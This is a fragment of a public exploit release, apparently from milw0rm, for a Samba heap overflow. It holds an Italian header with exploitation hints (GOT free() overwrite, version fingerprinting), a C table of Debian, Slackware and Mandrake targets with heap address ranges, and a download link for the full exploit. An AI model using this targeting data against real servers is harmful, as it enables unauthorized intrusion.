/***********************************************************************************/ /* Samba < 3.0.20 heap overflow */ /* per Debian 3.0.14a Debian e altre versioni */ /* per versionare il sorgente: */ /* usare l'opzione DEBUG */ /* usare free() dalla GOT (non funziona su Mandriva,RHEL e Fedora) */ /* da qualche parte nel 3°/4° pacchetto di risposta dice la versione di Samba */ /* coded by zuc@hack.it */ /***********************************************************************************/ #define VERSN 25 struct versions vers[VERSN] = { {"Debian 3.1 r0 X restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r0 X",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r0 noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r0 noX",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r0a X 1st",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r0a noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r0a noX",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r1 noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r1 noX",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r2 noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r2 noX",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r3 noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r3 noX",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r4 noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r4 noX",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r5 noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r5 noX",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r6a noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r6a noX",0x0827c000,0x0837f000,30*1024}, {"Slackware 10.0 restart",0x0827c000,0x0837f000,30*1024}, {"Slackware 10.0",0x0827c000,0x0837f000,30*1024}, {"Mandrake 10.1 noX",0x80380000,0x8045b000,30*1024}, {"Mandrake 10.1 X Kde",0x80380000,0x8045b000,30*1024}, {"Samba 3.0.x DEBUG",0x80380000,0x8045b000,30*1024} }; http://milw0rm.com/sploits/2009-lsa.zip # milw0rm.com [2009-01-08]